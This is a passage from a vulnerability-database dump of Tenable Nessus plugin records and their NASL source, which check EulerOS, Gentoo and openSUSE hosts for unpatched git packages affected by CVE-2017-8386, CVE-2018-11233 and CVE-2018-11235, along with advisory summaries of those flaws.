["p-cpe:/a:huawei:euleros:git", "cpe:/o:huawei:euleros:uvp:2.5.1"], "id": "EULEROS_SA-2018-1377.NASL", "href": "https://www.tenable.com/plugins/nessus/119068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119068);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/26\");\n\n script_cve_id(\"CVE-2017-8386\", \"CVE-2018-11235\");\n\n script_name(english:\"EulerOS Virtualization 2.5.1 : git (EulerOS-SA-2018-1377)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the git package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A flaw was found in the way git-shell handled\n command-line options for the restricted set of\n git-shell commands. A remote, authenticated attacker\n could use this flaw to bypass git-shell restrictions,\n to view and manipulate files, by abusing the instance\n of the less command launched using crafted command-line\n options.(CVE-2017-8386)\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design\n in which hooks are not obtained from a remote\n server.(CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1377\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?987c11d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-8386\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-6.1.h4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:16:38", "description": "The remote host is affected by the vulnerability described in GLSA-201805-13 (Git: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Git. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Remote attackers could execute arbitrary code on both client and server.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "type": "nessus", "title": "GLSA-201805-13 : Git: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:git", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201805-13.NASL", "href": "https://www.tenable.com/plugins/nessus/110212", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201805-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110212);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"GLSA\", value:\"201805-13\");\n\n script_name(english:\"GLSA-201805-13 : Git: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201805-13\n(Git: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Git. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Remote attackers could execute arbitrary code on both client and server.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201805-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Git users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-2.16.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-vcs/git\", unaffected:make_list(\"ge 2.16.4\"), vulnerable:make_list(\"lt 2.16.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:17", "description": "This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235, boo#1095219)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : git (openSUSE-2019-410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-debuginfo", "p-cpe:/a:novell:opensuse:git-debugsource", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-410.NASL", "href": "https://www.tenable.com/plugins/nessus/123178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-410.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123178);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-2019-410)\");\n script_summary(english:\"Check for the openSUSE-2019-410 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory\n (CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235, boo#1095219)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-arch-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-cvs-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-daemon-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-daemon-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debugsource-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-email-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-gui-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-p4-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-web-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"gitk-2.16.4-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:09", "description": "This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235, boo#1095219)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : git (openSUSE-2018-557)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-debuginfo", "p-cpe:/a:novell:opensuse:git-debugsource", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "cpe:/o:novell:opensuse:15.0", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-557.NASL", "href": "https://www.tenable.com/plugins/nessus/110335", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-557.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110335);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-2018-557)\");\n script_summary(english:\"Check for the openSUSE-2018-557 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory\n (CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235, boo#1095219)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-arch-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-cvs-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-daemon-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-daemon-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debugsource-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", 